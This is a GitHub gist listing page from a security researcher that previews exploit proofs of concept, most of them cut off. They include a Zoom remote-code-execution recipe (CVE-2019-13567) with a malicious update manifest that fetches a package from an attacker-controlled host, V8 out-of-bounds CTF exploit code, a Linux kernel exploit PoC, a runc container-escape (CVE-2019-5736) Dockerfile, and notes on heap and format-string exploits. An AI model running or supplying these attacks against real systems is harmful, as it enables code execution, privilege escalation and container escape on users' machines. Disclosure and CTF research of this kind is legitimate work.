Skip to content

Instantly share code, notes, and snippets.

William Bowling wbowling

Block or report user

Report or block wbowling

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@wbowling
wbowling / README.md
Last active Aug 29, 2019
Zoom RCE - CVE-2019-13567
View README.md

POC - https://youtu.be/zGSLBDo3N7s

  1. Create a malicious update manifest with the Package-url pointing a server you control:
Check-sum=11111111111111111111111111111111;Check2-sum=11111111111111111111111111111111;Update-Option=1;Current-version=5.4.53932.0709;Download-root=https://aw.rs/z;Package-url=https://aw.rs/z/5.4.53932.0709/zoomusInstaller.pkg?t=atupg;Package-name=zoomusInstaller.pkg;Installer-name=;ahcab-name=airhost.zip;sipcab-name=sipcall.zip;codesnippet-name=codesnippet_mac.zip;fullcab-name=zoomusInstallerFull.pkg;
  1. Upload the manifest it to a .zoom.us domain, one example is as the icon for a new https://marketplace.zoom.us/ app (there are client side checks to see if it's an image but they can be bypassed): https://marketplacecontent.zoom.us//sMLaMgPKSw2SAfIfpYV1Eg/zqJOtwryQkyO_UMykn2OdA/app/4yr1OelsSIGCMOj5CvI1JQ/ZAS3dFjlS8W0jJt48Dy9fA.jpg
@wbowling
wbowling / pwn.js
Last active May 6, 2019
starCTF (*CTF) 2019 oob-v8
View pwn.js
// uses https://github.com/saelo/jscpwn/blob/master/utils.js
var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
let f = wasm_mod.exports.hello;
var arr1 = [1.1];
var arr2 = [Date];
var arr_map1 = arr1.oob();
var arr_map2 = arr2.oob();
@wbowling
wbowling / babyjs.js
Created Apr 20, 2019
TG:HACK 2019 - Baby's First JavaScript Exploitation
View babyjs.js
let oob_arr = [1.1, 0x61616161, 3.3];
function getSetValue(i, v) {
if (v) {
oob_arr[i] = v;
} else {
return oob_arr[i];
}
}
@wbowling
wbowling / cve-2018-5333-poc.c
Created Mar 9, 2019
Example of using CVE-2019-9213 to make previous kernel bugs exploitable
View cve-2018-5333-poc.c
// 4.4.0-116-generic #140-Ubuntu SMP
#define _GNU_SOURCE
#include <err.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <unistd.h>
#include <stdio.h>
@wbowling
wbowling / Dockerfile
Last active Apr 16, 2019
POC for CVE-2019-5736
View Dockerfile
FROM ubuntu
RUN apt-get update -y && apt-get install -y gcc
RUN ( \
echo '#define _GNU_SOURCE'; \
echo '#include <fcntl.h>'; \
echo '#include <stdio.h>'; \
echo '#include <unistd.h>'; \
\
echo 'char *getenv(const char *__name) {'; \
View internet_of_seat.py
#!/usr/bin/env python2
# pylint: skip-file
"""
When performing a chunked transfer, realloc doesnt take into account the size of the headers allowing an overflow.
As the initial heap (0x100) is located inline we can overwrite the current heap location.
* overwrite __malloc_heap to point to our fake heap
* our fake heap size is huge so that memory os returned near the GOT
* overwrite memchr got with shellcode address
* win
@wbowling
wbowling / rand.py
Created Feb 21, 2018
microsoft c runtime implementation of rand srand in python
View rand.py
#!/usr/bin/env python
def srand(s):
global seed
seed = s
# microsoft c runtime implementation
def rand():
global seed
seed = (seed * 214013 + 2531011) % 2**64
View format0.py
#!/usr/bin/env python2
"""
Overwrite the GOT entry for __stack_chk_fail with 0x40061a so we jump there instead.
The address can be passed in via argv, we cant use nulls but we can use blank strings instead.
As the argv location is semi random, it takes around 500 iterations which is pretty reasonable for 64bit
"""
View mission009.py
#!/usr/bin/env python
import string
def srand(s):
global seed
seed = s
# microsoft c runtime implementation
def rand():
global seed
You can’t perform that action at this time.